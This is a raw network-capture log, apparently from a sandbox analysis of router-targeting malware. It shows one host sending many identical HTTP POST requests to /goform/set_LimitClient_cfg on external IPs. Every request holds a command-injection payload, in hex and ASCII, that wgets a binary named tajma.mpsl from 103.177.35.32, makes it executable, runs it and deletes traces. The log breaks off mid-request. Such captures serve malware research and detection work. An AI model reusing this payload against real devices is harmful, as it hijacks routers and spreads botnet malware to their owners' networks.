                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1288192.168.2.2350906177.113.143.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369085073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1289192.168.2.2359546158.206.97.108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369095087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1290192.168.2.236045012.204.76.938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369132042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1291192.168.2.2341274202.241.44.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369184017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1292192.168.2.233436224.92.110.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369189978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1293192.168.2.235634483.184.14.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369208097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1294192.168.2.235812414.70.131.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369254112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1295192.168.2.235941058.144.193.238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369304895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1296192.168.2.2354540123.181.61.2168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369335890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1297192.168.2.2344758195.33.17.518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369348049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1298192.168.2.234650897.86.202.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369369030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1299192.168.2.233616014.155.238.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369380951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1300192.168.2.235551492.140.11.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369400978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1301192.168.2.235953438.157.26.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369410992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1302192.168.2.2353330123.198.146.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369452000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1303192.168.2.234367659.15.197.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369462967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1304192.168.2.2354756142.148.64.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369512081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1305192.168.2.233638896.238.184.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369554043 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1306192.168.2.2341378165.187.76.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369560957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1307192.168.2.2343580126.158.136.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369579077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1308192.168.2.2344090161.35.173.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369596958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1309192.168.2.2339828115.216.87.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369623899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1310192.168.2.2347652151.134.82.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369635105 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
